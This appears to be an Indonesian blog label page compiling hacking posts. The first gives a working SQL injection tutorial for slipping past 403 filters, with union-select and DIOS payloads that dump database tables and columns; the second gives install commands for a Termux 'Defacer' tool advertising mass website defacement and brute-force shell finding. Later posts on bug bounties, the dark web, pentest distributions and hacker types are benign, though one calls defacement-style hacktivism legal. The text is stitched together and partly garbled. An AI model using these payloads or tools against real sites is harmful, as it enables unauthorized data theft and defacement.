Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Cara Saluran Situs 403 Forbidden || Teknik Bypass Sql Inject 403 Forbidden

Buka situs 403 forbidden dengan cara bypass 




Langkah tutorial - apa kabar sahabat langkah tutorial deface pada kesempatan kali ini kita akan buka bukan cara by pass situs yang eror sql inject tapi pas di saluran terdapat 403 forbidden
apa kabar sahabat langkah tutorial deface pada kesempatan kali ini kita akan buka bukan ca Cara saluran situs 403 forbidden || teknik bypass sql inject 403 forbidden
403 forbidden


Nah kini kita buka aksesnya menyerupai biasa dengan cara +order+by+1,2,3 4,5--+ untuk mencari colom yang eror jikalau sudah nemu kita lanjutkan

Cara install tools lazymux complate di termux  

Seperti biasa dengan cara +union+select+1,2,3,4,5--+ namun ketika kita melaksanakan ini terdapat saluran 403 forbidden nah mulai gundah gimana cara saluran nya kini mari kita coba dengan exploit code code tersebut 

cara install zanscan website vulnerabilities

Contoh:
Http://hostname.com/buycard/id=13+union+select+1,2,3,4--+

Menjadi comment 

Http://hostname.com/buycard/id=13/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/

maka taraaaa kita sanggup melihat colom dan tablenya mari kita lanjut kan ke dalam dios nya jikalau sobat blom punya dios sanggup cari di google diosnya 

Dengan dois atau magic arahan tersebut ternyata masih tetap 403 forbidden maka lakukan hal nya sama pada diosnya dengan cara 

commet 

/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

Lakukan hal yang sama setiap kali terdapat 403 forbidden 



Okeh hingga disini dulu kita suda sanggup bypass sql inject 403 fobidden 
Next kita akan bahas yang lain jikalau ada yang butuh pinjaman atau saran artikel jangan lupa tinggalkan jejak di colom komentar 


Sumber https://langkah-tutorial.blogspot.com/

Tools Defacer Termux (Tebas Index Di Termux No Root)


Aslamualaikum.... teman cyber, kali ini aku mau share Tools Termux buatan aku sendiri adalah Tools Defacer. Memang Tools menyerupai ini sudah tidak absurd lagi bagi para mengguna Termux karna sudah banyak para programing-programing yg sudah menciptakan Alat yg satu ini dengan aneka macam macam versi. Tapi kali ini tools Defacer yg aku buat sudah di lengkapi dengan beberapa alat hacking di dalamnya menyerupai berikut bbrapa fungsi & alat yg tersedia di dalam nya.

1). Tebas Index (Berfungsi untuk Deface halaman depan website secara langsung)

2). Web Scan (Berfungsi untuk mengetahui gosip website menyerupai alamat IP,subdomain,vuln sqli,Dll)

3). Auto Deface (Berfungsi untuk men Deface website secara otomatis sebanyak 10 website lebih)

4). Tools Installer (Alat penyedia install secara otomatis beberapa alat hacking dengan cara yg instan)

5). Bikin Script Deface (Berfungsi untuk menciptakan script Deface dengan gampang dan simple di Termux)

6). Shell Finder (Berfungsi untuk mencari sebuah saluran shell backdor orang lain dengan memakai metode Brute Force)

Itulah beberapa fungsi alat yg tersedia di dalam tools Defacer. Penasaran? Langsung aja install dengan cara ikuti perintah di bawah👇

Comand:

$apt update && apt upgrade
$apt install bash
$apt install git
$git clone https://github.com/21D4N404/Defacer.git

Tunggu sampe tools tanggapan di install, Kemudian untuk cara menjalankan tools nya kalian tinggal ketik perintah di bawah

$cd Defacer
$sh ICA.sh

Nanti akan ada lagi proses peng installan supaya tools berjalan dengan baik, tidak mengecewakan cukup usang install nya😂

Penampakan dari tools defacer nih👇


Okee deh sekian artikel dari saya... wasalamualikum Wr,Wb..

Sumber http://www.cyber-teach.zone.id/

Skin Mau Gold



LINK DONLOAWD : MEDIAFIRE
Sumber https://syainet.blogspot.com/

Aplikasi Hacking lewat Hp Android :[13] Aplikasi Android Para Hacker

13 Aplikasi Hacking Terbaik untuk Android
IME android - Aplikasi hacking kini sudah banyak beredar peruntukan HP android sebelumnya hacking hanya bisa kita lakukan melalui komputer,yang biasanya menggunakan Linux.
Sistem operasi Linux menjadi salah satu sistem operasi yang paling disukai oleh para Hacker untuk melancarkan aksinya . kini Android sistem operasi yang mempunyai struktur menyerupai

Samsung Meluncurkan Agenda Mobile Bug Bounty, Menunjukkan Hadiah Sampai 200.000 Dollar

Samsung Meluncurkan Program Mobile Bug Bounty, Memberikan 200.000 Dollar Per Bug


Samsung Meluncurkan Program Mobile Bug Bounty Samsung Meluncurkan Program Mobile Bug Bounty, Memberikan Hadiah Hingga 200.000 Dollar


Program bug bounty bagi perusahaan tekologi besar tidaklah abnormal di dengar. Sekarang, nama "SAMSUNG" juga termsauk dalam daftra perusahaan yang menawarkan uang untuk  Security Researchers (Peneliti Keamanan) yang pertanda bug atau kerentanan pada produk Samsung sendiri.

Samsung telah mengumumkan inisiatif mereka untuk meluncurkan progrram bug bounty yang disebut Mobile Security Rewards Program. Dan ibarat namanya, dengan kegiatan ini, Samsung akan menawarkan hadiah berupa uang untuk Bug Hunter (Pemburu Bug) yang bisa menemukan celah atau kerentanan keamanan pada banyak sekali perangkat seluler Samsung, yang sebagian besar memakai sistem operasi Android.

Sampai dikala ini, Ada sekitar 38  perangkat seluler Samsung, termasuk Seri Galaxy S, Seri Note, Seri A, Seri J, dan Seri Tab, yang termasuk dalam kegiatan ini. Perangkat tadi mendapatkan pembaruan keamanan semenjak Oktober 2015.
Ada juga beberapa software Samsung yang disertakan juga, ibarat Bixby, Samsung Pay, Samsung Pass, dan lain-lain yang memenuhi syarat untuk mengikuti bug bounty. Samsung menyampaikan bahwa yang memenuhi syarat untuk mengikuti kegiatan bug bouty ini harus versi Android dan Firmware yang terbaru.

Samsung pun tidak taggung-tanggung dalam menawarkan hadiah untuk kegiatan ini. Samsung berjanji untuk mengeluarkan uangg sampai 200.000 Dollar AS, dan jikalau dikonversi menjadi Rupiah menjadi 2,634,378,394 Rupiah, harga yang sangat fantastis. Namun, Samsng juga meberikan hukum ibarat tingkat keparahan bug, semakin tinggi tingkat keparahan bug semakin tinggi juga hadian yang sanggup diraih, dan juga apakah peneliti bisa menawarkan POC (Proof-Of-Concept).

Samsung juga menciptakan halaman gres di web resminya untuk rincian lebih lanjut perihal  program Mobile Security Rewards mereka. Apabila anda berminat, kalian sanggup mengunjungi halamn tersebut untuk panduan dan untuk pengiriman laporan.

Bug Bounty yaitu kegiatan yang anggun bagi perusahaan untuk mengetahui kekurangan atau kerentanan penting pada produk mereka. keuntungannya yaitu mereka tidak perlu melaksanakan perekrutan dan berusaha leih keras untuk mengetahui kerentanan produknya. Perusahaan itu hanya harus membayar jikalau pelaporan bug disetujui.

Di sisi lain, ini merupakan kegiatan yang menguntungkan bagi Security Researchers dan WhiteHats Hacker. Mereka sanggup mendapatkan penghasilan berupa uang dalam mencari kerentanan atau bug. Perusahaan-perusahaan besar ibarat Google, Apple, Microsoft, dll juga mempunyai kegiatan bug bounty sendiri.

Kunjungi Samsung Mobile Security dengan link ini
Sumber http://agakgaptek.blogspot.com/

Apa Perbedaan Antara Deep Web, Darknet, Dan Dark Web?


Internet sangat luas, namun sebagian besar masih belum tersentuh oleh dunia biasa. Kami menganggapnya itu dengan nama Deep Web, Darknet, dan Dark Web. Darknet ialah jenis jaringan yang tidak sanggup diakses dengan memakai mode normal. Deep Web - yang meliputi web gelap sebagai subset - ialah bab dari world wide web yang tidak diindeks oleh mesin pencari menyerupai Google, Bing, DuckDuckGo.

Bagi sebagian besar dari kita, web terbatas pada sepuluh dua puluh atau mungkin lima puluh situs web. Sebagian besar koleksi terbatas ini berupa situs dan layanan Google. Pada kenyataannya, internet sangat besar, dan mempunyai sekitar satu miliar situs web yang ada di server di seluruh dunia.
Bahkan dengan miliaran situs web itu, web tidak lengkap. Banyak yang percaya bahwa world wide web yang kita lihat hanyalah puncak gunung es. Dua istilah Darknet dan Deep Web, dalam beberapa hal, membenarkan adanya jaringan tersembunyi ini yang kebanyakan orang tidak sadar. Dan mereka yang tahu perihal darknet sering membingungkannya dengan web yang dalam. Padahal, keduanya benar-benar terpisah.



Apa itu Deep Web?


 namun sebagian besar masih belum tersentuh oleh dunia biasa Apa Perbedaan Antara Deep Web, Darknet, dan Dark Web?

Selama berabad-abad, saat teknologi menjadi maju, insan membangun mesin yang bisa menyelam ke kedalaman samudra. Begitulah cara kita bisa menemukan sisa-sisa RMS Titanic. Crawler mesin pencari melaksanakan pekerjaan yang sama menyerupai yang dilakukan oleh kapal selam penjelajah. Mereka terjun ke internet dan mencatat apa pun yang mereka temukan.

Mereka mungkin telah menemukan Titanic, tapi ada banyak hal yang bisa ditemukan di samudera tak berdasar. Mirip dengan kasus crawler mesin telusur, mereka belum mengidentifikasi banyak sekali bab World Wide Web, dan kami menyebutnya Web Deep.

Misalnya, mesin pencari tidak akan sanggup mengakses server dan situs web yang menginangi data perihal beberapa misi diam-diam rahasia yang dipimpin oleh pemerintah. Tapi web dalam tidak misterius kedengarannya. Jaringan pribadi, ditandai sebagai web dalam, bisa berada sempurna di samping rumah Anda. Hanya saja internet yang tidak terjangkau oleh crawler search engine standar. Misalnya, jaringan dikelola oleh beberapa layanan streaming berbayar. Ini ialah jenis web yang dalam atau web tersembunyi. Jelas, mesin pencari tidak akan menentukan berlangganan bulanan untuk mengindeks katalog situs web semacam itu.

Apa itu Darknet?


Berlawanan dengan deep web, Darknet lebih dikenal masyarakat. Ini ialah jaringan terenkripsi yang dibangun di atas internet yang ada, dan perangkat lunak atau perangkat khusus diharapkan untuk mengakses darknet. Mungkin saja, protokol konvensional yang dipakai di internet mungkin tidak bekerja di darknet.

Darknet memperlihatkan anonimitas kepada pengguna. Salah satu darknet tersebut ialah Tor atau The Onion Router. Anda memerlukan browser Tor untuk masuk ke jaringan Tor.

Tor sanggup dipakai untuk mengunjungi situs internet sehari-hari, namun juga mempunyai banyak situs dan layanan tersembunyi yang tidak sanggup diakses di internet biasa. Tor memaksa mereka memakai protokolnya yang dikenal dengan Tor Hidden Service Protocol. Dan situs-situs yang terbatas pada jaringan Tor mempunyai alamat .onion khusus. Karena ini, darknet Tor juga dikenal sebagai bawang bombay.

Jaringan Friend-to-Friend (F2F) ialah jenis darknet yang lain. Dalam kasus ini, dua orang yang bersahabat berkomunikasi satu sama lain secara eksklusif melalui internet. Mereka mungkin ingin menyebarkan beberapa file melalui koneksi P2P. Jaringan semacam itu, yang tidak bisa diakses oleh orang lain, sanggup dienkripsi atau dilindungi kata sandi. Jadi, hanya orang yang bersangkutan yang mempunyai akses.

Apa itu Dark Web?

Ada hal lain yang ingin Anda sadari, web yang gelap. Anda bisa memikirkan web gelap sebagai bab dari web dalam. Anda perlu memahami perbedaan antara web dan darknet yang dalam, dan fakta bahwa internet dan WWW (World Wide Web) bukanlah hal yang sama.

Darknet ialah jaringan, dan web dalam merupakan bab dari World Wide Web yang berada di luar jangkauan mesin pencari. Jadi, kita bisa menguraikan web gelap menyerupai World Wide Web dari darknets menyerupai Tor, Freenet, dll. Artinya, layanan dan situs yang berjalan di darknet ialah web gelap.


Itulah perbedaan antara Deep Web, Dark Net, Dark Web berdasarkan pendapat saya sendiri. Jika pendapat saya kurang anda terima, silahkan tuliskan pikiran atau pendapat Anda di kolom komentar. Terima kasih

Sumber http://agakgaptek.blogspot.com/

Sistem Operasi Terbaik Untuk Hacking Dan Penetration Testing



Sistem Operasi Terbaik Untuk Hacking Dan Penetration Testing - Seiring berjalannya waktu, banyak banyak sistem operasi berkembang. Semua diciptakan sesuai fungsinya masing masing. Kali ini AgakGaptek akan menampilkan Sistem Operasi yang cocok untuk Ethical Hacking dan Penetration Testing.


1 Kali Linux

Dikembangkan oleh Offensiv Security sebagai versi lain dari Backtrack, Kali Linux berdasarkan aku menjadi yang terbaik untuk ethical hacking dan penetration testing. Sistem Operasi berbasis Debian ini dilengkapi dengan 600+ alat atau software penetration testing. Software – software diperbarui secara teratur dan tersedia untuk aneka macam platform ibarat ARM dan Vmware. Unutk pekerjaan forensic analis, Kali Linux menjadi yang terbaik alasannya software yang lengkap untuk mendeteksi kelemahan atau kerentanan. Sekarang Kali Linux didasarkan pada model rolling rilis.

2 DracOS Linux

Proud To Be Indonesian People. Sistem operasi yang satu ini di bangkit dan dikembangkan oleh Orang Indonesia. Dari turunan apakah distro linux ini? Jangan tanya dari  turunan apa, DracOS Linux di bangkit dari awal ( Linux From The Stratch) bukan turunan distro lain. DracOS Linux dilengkapi ratusan tools untuk keperluan ethical hacking dan penetration testing, juga untuk forensics. DracOS linux tidak menyajikan dekstop GUI tetapi memakai CLI atau berbasis text, di tujukan supaya pengguna DracOS lInux yaitu user yang mandiri. Hampir semua tools atau aplikasi dijalankan dengan CLI. Berikut tools untuk pentest

  • Information Gathering
  • Vulnerability Assessment
  • Web Attack
  • Exploitation Testing
  • Privilege Escalation
  • Password Attack
  • Social Engineering
  • Man In The Middle Attack
  • Stress Testing
  • Wireless Attack
  • Maintaining Access
  • Forensics Tools
  • Reverse Engineering
  • Malware Analysis
  • Covering Track


3.  BackBox Linux

BackBox linux yaitu distro linux berbasis Ubuntu yang berfokus untuk keamanan dan penetration testing. BackBox tiba dengan banyak tools-tools yang berafiliasi dengan analisis keamanan dan penetration test yang sanggup membantu anda dalam menganalisis web atau sistem. Menurut saya, BackBox Linux ringan dan gampang dipakai dilengkapi dengan tampilan GUI sehingga BackBox di gemari oleh para Hacker. 

4. Pentoo Linux

Di buat berbasis Gentoo Linux , Pentoo yaitu distro linux untuk penetration testing yang tersedia sebagai 32 dan 64-bit dan sanggup di install Live CD. Distro ini memakai dekstop XFCE dengan pertolongan tools-tools pentest yang cukup lengkap
Dilengkapi dengan aneka macam macam alat,diantaranya Exploit, Cracker, Database, Scanner dll. Cukup recommended untuk acara hacking dan penetration testing



Sumber http://agakgaptek.blogspot.com/

Ini Dia,8 Kelas Kelas Dalam Dunia Hacker

8 Kelas Kelas Hacker




Seperti yang kita ketahui Hacker adalah orang yang mempelajari, menganalisis, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk laba atau dimotivasi oleh tantangan, contohnya ada event bug bounty, atau memang pekerjaannya menganalisis sistem,dan lain lain.  Nah, kali ini saya akan menjelaskan wacana kelas-kelas hacker berdasarkan AgakGaptek.

  1. Black-Hat Hacker
  2. White-Hat Hacker
  3. Gray-Hat Hacker
  4. Suicide Hacker
  5. Script Kiddies
  6. Cyber Terorris
  7. State Sponsored Hacker
  8. Hacktivist


Untuk penjelasanya kita akan urakan satupersatu. Simak kelas kelas hacker berikut.

1. Black-Hat Hacker

Black-Hat Hacker yaitu hacker yang melanggar keamanan komputer untuk kepentingan diri sendiri atau untuk teamnya dengan alasan dendam atau iri terhadap suatu website ataupun sebuah sistem. Istilah ini diciptakan oleh Richard Stallman dengan latar belakang kedengkian dari hacker kriminal terhadap main-main dan eksplorasi oleh hacker, atau etos  kerja White-Hat Hacker yang mengeksplorasi sistem untuk mengidentifikasi suatu sistem dan memperbaikinya. Black-Hat Hacker membobol jaringan atau sistem untuk menghancurkan,memodifikasi, dan mencuri data atau jaringan tidak sanggup dipakai lagi. Ini yang angker bagi pengguna-pengguna internet yang tidak protectiv .Sebagai SmartUser kita harus berhatihati saat berselancar di Internet bebas. Bisa diartikan Black-Hat Hacker yaitu musuh dari White-Hat Hacker.

2. White-Hat Hacker

White-Hat Hacker menggambarkan seorang hacker yang mengidentifikasi atau menguji kelemahan keamanan dalam sebuah sistem komputer atau jaringan, bukan untuk mengambil aau mencuri data untuk laba sendiri tetapi melaporkan kepada pemilik sistem komputer,web atau jaringan semoga diperbaiki kelemahannya sebelum dimanfaatkan oleh orang lain ibarat Black-Hat Hacker. Salah satu Metode untuk memberitahu pemilik sistem ini dengan mengirimkan email pengaduan terhadap kelamahan sistem kepada Administrator Sistem Komputer. White-Hat Hacker Biasanya dipanggil “Ethical Hacker” Atau Hacker yang ber etika. Dikarenakan hacker White-Hat tidak mencuri atau merusak data tetapi sebaliknya malah menganalisis keamanan dan menjaganya.

3. Grey-Hat Hacker

Istilah Grey-Hat Hacker mengacu pada hacker atau andal keamanan komputer yang kadang kadang melanggar aturan atau adab hacking, tetapi Grey-Hat hacker tidak mempunyai niat jahat ibarat Black-hat Hacker. Grey-Hat ini ada ditengah tengah antara White-Hat Hacker dengan Black-Hat Hacker. 

Perbedaannya terletak pada Grey-Hat untuk menemukan kelemahan atau kerentanan suatu sistem. Jika White-Hat Hacker masuk kedalam sistem komputer atau jaringan atas ijin Administrator atau pemilik sistem komputer dengan tujuan untuk memilih seberapa kondusif sistem itu terhadap Hacker Black-Hat. Sedangakn Black-Hat Hacker masuk kedalam suatu sistem atau jaringan tanpa ijin dan mengungkap kelemahan tersebut atau mencuri data untuk kepentingan diri sendiri. Grey-Hat hacker ada ditengah tengah, Mereka mempunyai niat dan ketrampilan ibarat Hacker White-Hat tetapi masuk kedalam sistem atau jaringan tanpa ijin.

Menurut salah satu definisi Grey-Hat Hacker, saat mereka menemukan kelemahan atau bug suatu sistem mereka tidak akan menyampaikan kepada vendor atau direktur bagaimana caranya, tetapi menyampaikan jasa untuk memperaikinya dengan bayaran uang.

4. Suicide Hacker

Suicide dalam bahasa Indonesia “Bunuh Diri”. Ya konsep Suicide Hacker ibarat pelaku bom bunuh diri. Mereka tidak memperdulikan resiko yang tinggi terhadap apa yang sedang dilakukan, mungkin karena alasannya apa mereka rela melakukannya. Mereka siap dipenjara berpuluhpuluh tahun, walaupun sudah tau hukumannya tetapi mereka tetep melakukannya. Mungkin mereka menyerang Sistem Perbankan dan kontrol kemudian lintas negara.

5 Script Kiddies

Biasa dipanggil skiddie, skid, atau script bunny. Disini saya memakai panggilan Skiddie. Skiddie yaitu seorang individu yang terampil memakai aktivitas atau skrip yang dibentuk dan dikembagkan oleh orang lain untuk menyerang sistem komputer,jaringan dan deface website. Secara umum diasumsikan bahwa Skiddie yaitu orang yang tidak mempunyai kemampuan untuk menulis instruksi atau menciptakan aktivitas tetapi andal dalam memakai aktivitas yang di buat orang lain dengan tujuan semoga di segani teman-teman, masyarakat, atau sekolah.

6. Cyber Terorist

Bisa diartika teroris yang memakai teknologi komputer dan internet untuk menjadikan ketakutan dan gangguan. Biasanya mereka membuatkan virus komputer serta mengancam orang secara online. Jika ada yang membuatkan dan mengancam orang melalui internet khususnya kejahatan yang mengancam ancaman nyata, pelakunya yaitu Cyber-Terorist . Mungkin maksud ideologis mereka ingin meneror dan melakukannya untuk kepentingan sendiri, pemerintah takut bahwa Cyber-Terorist bisa mengganggu perekonomian suatu negara.

7. State Sponsored Hackers

Jika sebelumnya anda melihat perang antara satu negara dengan negara lain dengan kontak fisik atau senjata api, maka kini juga terjadi secara online. State Sponsored Hackers yaitu hacker yang si sponsori oleh negara untuk memastikan bahwa tidak ada celah pada keamanan infrastruktur negara. Mereka di bayar oleh negara bisa jadi untuk menyusup ke sistem negara lain dan mencuri data mereka , atau bisa saja merusak data. Mereka mempunyai keahlian khusus pada bidangnya, keahlian yang lebih dari kelas kelas Hacker Sebelumnya.

8. Hacktivist

Hacktivism yaitu tindakan hacking,atau membobol sistem komputer untuk tujuan bermotif politik dan sosial. Orang yang melaksanakan Hacktivism yaitu Hacktivist. Hacktivist memakai alat dan teknik yang sama ibarat hacker umumnya tapi tidak begitu mengganggu layanan dan hanya membawa perhatian terhadap pesan yang di tuliskan oleh Hacktivist pada sebuah web atau sistem komputer. 

Baru gres ini ada hacktivist yang kesal karena sering di tilang polisi, dan hactivist itu menitipkan pesan pada sebuah website kepolisiaan tempat setempat atau biasa di sebut Deface Web. Apakah hacktivism Legal? Menurut saya sendiri itu hal legal, karena tindakan mereka setara dengan protes atau kritik, asal hacktivist itu mem-backup data yang di modifikasinya.


Itulah beberapa kelas kelas Hacker, kita bisa menilai kita sendiri. Pesan untuk Black-Hat Hacker, kurangilah merusak sistem ,jaringan atau web. Sebaiknya kalian bilang kepada Vendor/Administrator kalau ada celah ,jika memang rejeki kalian bisa di kasih uang sebagai bayaran

Sumber http://agakgaptek.blogspot.com/